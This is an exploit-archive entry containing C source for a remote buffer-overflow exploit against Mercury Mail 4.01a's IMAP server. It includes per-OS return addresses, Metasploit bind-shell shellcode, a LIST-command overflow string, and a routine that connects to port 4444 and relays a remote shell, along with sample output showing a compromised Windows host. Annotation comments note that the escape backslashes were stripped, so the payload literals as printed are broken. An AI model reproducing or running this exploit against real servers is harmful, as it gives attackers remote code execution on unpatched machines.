
# Title : Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
# Published : 2005-09-20
# Author : c0d3r
# Previous Title : RealPlayer/Helix Player Remote Format String Exploit (linux)
# Next Title : Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow


/*   
     Mercury imap4 server remote buffer overflow exploit
     author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
     package : Mercury mail transport system 4.01a and probably prior
     workaround : upgrade to 4.01b version
     advisory : not available right now 
     company address : www.pmail.com
     timeline :
     15 Sep 2005 : vulnerability reported on the securiteam mailing list
     20 Sep 2005 : IHS exploit released 
     exploit features :
     1) 5 working targets including win2k , winxp , win2k3
     2) reliable metasploit shellcode
     3) autoconnect to shell
     bad chars are : 0x20 0x0a 
     compiled with visual c++ 6 : cl mercury_imap.c 
     greeting to :
     www.ihsteam.com       the team , LorD and NT heya
     www.ihsteam.net       english version ,
     www.exploitdev.com    Jamie and Ben the two good brothers also my brothers
     www.metasploit.com    when are you gonna release the newer version :P ?
     www.class101.org      class with his new laptop :>
     www.milw0rm.com       str0ke , I am sending it to you first dont doubt :d 
     www.c0d3r.org         study time started :((( , pitty for the c0d3r !
     shout to actionspider 
     read these lines and try to understand ( I know you cant akhey ) that 
     a script kiddie (defacer) could never be compared to an exploit coder
     try to grow , being grown up is not related to age  -- with respects 
*/
/*

D:projects>mercury_imap.exe ihs 143 4 c0d3r abc

-------- mercury imap remote BOF exploit by c0d3r

[+] target : windows 2003 server enterprise service pack 1
[+] building login data
[+] building overflow string
[+] attacking host ihs
[+] packet size = 625 byte
[+] connected
[+] sending login info
[+] sending exploit string
[+] exploit sent successfully to ihs
[+] trying to get shell
[+] connecting to ihs on port 4444
[+] target exploited successfully
[+] Dropping into shell

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

H:MERCURY>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 625
// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   


// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
// bad chars : 0x00 0x0a 0x20 0x0d

// Payload bytes exactly as shipped in the original listing (see the comment
// above for what the author says about them). In this copy the escape
// backslashes have been stripped (extraction artifact), so the literal as
// printed is plain ASCII text rather than the byte string described.
// Treated as an opaque blob here; not decoded or reviewed.
char shellcode[]=
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x92"
"xc9xd2x3bx83xebxfcxe2xf4x6exa3x39x76x7ax30x2dxc4"
"x6dxa9x59x57xb6xedx59x7exaex42xaex3exeaxc8x3dxb0"
"xddxd1x59x64xb2xc8x39x72x19xfdx59x3ax7cxf8x12xa2"
"x3ex4dx12x4fx95x08x18x36x93x0bx39xcfxa9x9dxf6x13"
"xe7x2cx59x64xb6xc8x39x5dx19xc5x99xb0xcdxd5xd3xd0"
"x91xe5x59xb2xfexedxcex5ax51xf8x09x5fx19x8axe2xb0"
"xd2xc5x59x4bx8ex64x59x7bx9ax97xbaxb5xdcxc7x3ex6b"
"x6dx1fxb4x68xf4xa1xe1x09xfaxbexa1x09xcdx9dx2dxeb"
"xfax02x3fxc7xa9x99x2dxedxcdx40x37x5dx13x24xdax39"
"xc7xa3xd0xc4x42xa1x0bx32x67x64x85xc4x44x9ax81x68"
"xc1x9ax91x68xd1x9ax2dxebxf4xa1xc3x67xf4x9ax5bxda"
"x07xa1x76x21xe2x0ex85xc4x44xa3xc2x6axc7x36x02x53"
"x36x64xfcxd2xc5x36x04x68xc7x36x02x53x77x80x54x72"
"xc5x36x04x6bxc6x9dx87xc4x42x5axbaxdcxebx0fxabx6c"
"x6dx1fx87xc4x42xafxb8x5fxf4xa1xb1x56x1bx2cxb8x6b"
"xcbxe0x1exb2x75xa3x96xb2x70xf8x12xc8x38x37x90x16"
"x6cx8bxfexa8x1fxb3xeax90x39x62xbax49x6cx7axc4xc4"
"xe7x8dx2dxedxc9x9ex80x6axc3x98xb8x3axc3x98x87x6a"
"x6dx19xbax96x4bxccx1cx68x6dx1fxb8xc4x6dxfex2dxeb"
"x19x9ex2exb8x56xadx2dxedxc0x36x02x53x62x43xd6x64"
"xc1x36x04xc4x42xc9xd2x3b";


  // Forward declaration of the console<->socket relay defined after main().
  void gotshell (int newsock);
  // File-scope objects have static storage and are zero-initialised; main()
  // relies on that when it strcat()s into point_esp (4 bytes + NUL fits in 5).
  // NOTE(review): sock/rc/rc2 are unsigned int while Winsock uses SOCKET and
  // int; this only lines up on 32-bit builds, which is what the header targets.
  unsigned int rc,sock,os,addr,rc2 ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  char point_esp[5];
  unsigned short port;
  // IMAP tag + command prefixes, written as hex escapes (the backslashes are
  // missing in this copy): req1 decodes to "0000 LOGIN", req2 to "0001" and
  // vuln_command to "LIST".
  char req1[] =  "x30x30x30x30x20x4Cx4Fx47x49x4E";
  char req2[] =  "x30x30x30x31";
  // Heap buffers built in main(); neither is ever freed.
  unsigned char *login,*exploit;
  char vuln_command[] = "x4Cx49x53x54";
  // Per-target 4-byte values selected by argv[3] in main(); see the author's
  // comments. Each is 4 bytes + NUL, which is what sizeof(point_esp)-1 copies.
  char winxpsp1[]   = "xCCx59xFBx77"; // jmp esp in ntdll
  char winxpsp2[]   = "xEDx1Ex94x7C"; // jmp esp (not tested)
  char win2ksp4[]   = "x23xdexafx01"; // call esp in kernel32.dll
  char win2k3_sp0[] = "xABx8BxFBx77"; // jmp esp in ntdll
  char win2k3_sp1[] = "x6AxFAxE8x77"; // push esp - ret in kernel32
                    
 // Entry point. argv: host, port, target index (0-4), username, password.
 // Builds two IMAP lines (a LOGIN, then a LIST whose argument is the 625-byte
 // `buffer`), sends them to host:port, then opens a second connection to the
 // hard-coded port 4444 and hands that socket to gotshell().
 // Mitigation per the header comment: upgrade Mercury to 4.01b.
 // NOTE(review): in this copy the backslashes of every "\x.."/"\n"/"\r\n"
 // escape have been stripped (extraction artifact), so the string literals
 // below read as plain text rather than the bytes the comments describe.
 // Returns: falls off the end without a return statement (C99 makes that
 // return 0; C89 leaves it unspecified); every error path calls exit(-1).
 int main (int argc, char *argv[]){
  
	
 if(argc < 6) {
 printf("n-------- mercury imap remote BOF exploit by c0d3rn");
 printf("-------- usage : imap.exe host port target username passwordn");
 printf("-------- target 1 : windows xp service pack 1         : 0n");
 printf("-------- target 2 : windows xp service pack 2         : 1n");
 printf("-------- target 3 : windoes 2k advanced server sp 4   : 2n");
 printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3n");
 printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4n");
 printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abcnn");	
 exit(-1) ;
  } 
  printf("n-------- mercury imap remote BOF exploit by c0d3rnn");
 // Target index selects which 4-byte constant is appended to point_esp.
 // point_esp is a zero-initialised file-scope array, so strcat() appends to
 // an empty string; a negative or non-numeric argv[3] lands in `default`.
 os = (unsigned short)atoi(argv[3]); 	 
  switch(os)
  {
   case 0:
    strcat(point_esp,winxpsp1);
    printf("[+] target : windows xp service pack 1n");
	break;
   case 1:
    strcat(point_esp,winxpsp2); 
    printf("[+] target : windows xp service pack 2n");
	break;
   case 2:
    strcat(point_esp,win2ksp4); 
    printf("[+] target : windows 2000 advanced server service pack 4n");
	break;
   case 3:
	strcat(point_esp,win2k3_sp0);
	printf("[+] target : windows 2003 server enterprise service pack 0n");
	break;
   case 4:
	strcat(point_esp,win2k3_sp1);
	printf("[+] target : windows 2003 server enterprise service pack 1n");
	break;
   default:
    printf("n[-] this target doesnt exist in the listnn");
   
    exit(-1);
  }  
	
  printf("[+] building login datan");
  // login is a 256-byte heap buffer (malloc result unchecked, never freed).
  // argv[4]/argv[5] are formatted in with unbounded sprintf(), so long
  // command-line arguments overflow this tool's own heap.
  login = malloc(256);
  memset(login,0,256);
  sprintf(login,"%s %s %srn",req1,argv[4],argv[5]);

    // Creating heart of exploit code 4 5
  
    printf("[+] building overflow string");
  
    // buffer (625 bytes) is filled with NOP, point_esp is copied at offset
    // 260 and shellcode at offset 280 (sizeof-1 drops each NUL terminator).
    memset(buffer,NOP,size);
    memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
    memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
    // buffer has `size` elements, so index `size` is one past the end: an
    // out-of-bounds write (undefined behaviour). The "%s" below also depends
    // on buffer being NUL-terminated, which this write does not guarantee.
    buffer[size] = 0;
    // 4 + 1 + 4 + 1 + 625 + 2 + NUL fits in 1000; malloc again unchecked
    // and never freed.
    exploit = malloc(1000);
    memset(exploit,0,1000);
    sprintf(exploit,"%s %s %srn",req2,vuln_command,buffer);
	
   // EO heart of exploit code 

  
			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !n");
   exit(-1);
  }
	// Name lookup first; fall back to a dotted-quad parse when it fails.
	hp = gethostbyname(argv[1]);
  Sleep(1500);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp)  && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %sn",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  // Winsock's socket() reports failure as INVALID_SOCKET, not 0, so this
  // check never fires; the same pattern is repeated for the second socket.
  if (!sock){ 
   printf("[-] socket() error...n");
   exit(-1);
  }
	  // h_length bytes are copied into sin_addr without checking that
	  // h_addrtype is AF_INET (IPv4 only, as the header implies).
	  if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  // atoi() gives no error indication; a non-numeric port becomes 0.
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("n[+] attacking host %sn" , argv[1]) ;
  
  Sleep(1000);
  
  // sizeof yields size_t but "%d" expects int (mismatched format argument).
  printf("[+] packet size = %d byten" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1500) ;
     printf("[+] connectedn") ;
     printf("[+] sending login infon") ;
     // send() return values (partial sends, errors) are not checked.
     send(sock,login,strlen(login),0);
     Sleep(1500);
     printf("[+] sending exploit stringn") ;
     send(sock,exploit,strlen(exploit),0);
     Sleep(1500);
     printf("[+] exploit sent successfully to %s n" , argv[1]);
     printf("[+] trying to get shelln");
     printf("[+] connecting to %s on port 4444n",argv[1]);
     // The first socket handle is overwritten here without closesocket(),
     // so it leaks. `tcp` keeps the resolved address; only family and port
     // are reassigned before the second connect().
     sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     Sleep(1500);
     if (!sock){ 
     printf("[-] socket() error...n");
     exit(-1);
	 }
	 tcp.sin_family = AF_INET;
	 tcp.sin_port=htons(4444);
	 rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
     if(rc2 != 0) {
	 printf("[-] exploit probably failedn");
	 exit(-1);
	 }
     if(rc2==0)
	 {
	  printf("[+] target exploited successfullyn");
      printf("[+] Dropping into shellnn");
	 gotshell(sock);
	 }
  } 
  
  else {
      printf("[-] ouch! Server is not listening .... n");
 }
  // Reached after gotshell() returns or when the first connect() failed
  // (the other failures exit(-1) above). WSACleanup() is only ever called
  // inside gotshell(), so the connect-failed path skips it; login and
  // exploit are never freed.
  shutdown(sock,1);
  closesocket(sock);
  }
   // Relays bytes between the console (fd 0 in, fd 1 out) and new_sock until
   // either side reports an error or end of stream. Calls WSACleanup() on
   // every exit path, so Winsock teardown happens here rather than in main().
   // Parameters: new_sock - a connected socket handle owned by the caller
   // (the caller still closes it). Returns nothing.
   // NOTE(review): read()/write() on fds 0/1 are the CRT's POSIX-style calls;
   // on MSVC they are declared in <io.h>, which this file does not include.
   void gotshell(int new_sock)  
	{
  struct timeval tv;
  int length;
  unsigned long o[2];
  char bufferx[1000];

  // 1-second poll timeout, set once and reused for every select() call.
  // NOTE(review): Winsock leaves tv untouched; POSIX select() may modify it,
  // so this relies on Windows behaviour.
  tv.tv_sec = 1;
  tv.tv_usec = 0;

  while (1) {
	
	// o[] is hand-built to match the Winsock fd_set layout (count, then the
	// handle array), which is what makes the cast below work on Win32; it is
	// not portable to other fd_set representations.
	o[0] = 1;
	o[1] = new_sock; 

	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
	if(length == 1)
		{
	// Socket readable: copy one chunk to stdout. Any error or EOF ends the
	// relay (select() errors, e.g. SOCKET_ERROR, fall into the else branch).
	length = recv (new_sock, bufferx, sizeof (bufferx), 0);
	if (length <= 0) 
		{
	printf ("[-] Connection closed.n");
	WSACleanup();
	return;
		}
	length = write (1, bufferx, length);
	if (length <= 0) 
		{
	printf("[-] Connection closed.n");
	WSACleanup();
	return;
		}
		}
	else
	{
	// Nothing pending on the socket within the timeout: block on console
	// input and forward it. Remote data arriving meanwhile is only drained
	// after the next local read completes.
	length = read (0, bufferx, sizeof (bufferx));
	if (length <= 0) 
		{
	printf("[-] Connection closed.n");
	WSACleanup();
	return;
		}
	length = send(new_sock, bufferx, length, 0);
	if (length <= 0) 
	{
	printf("[-] Connection closed.n");
	WSACleanup();
	return;
				}
			}
		}
   }
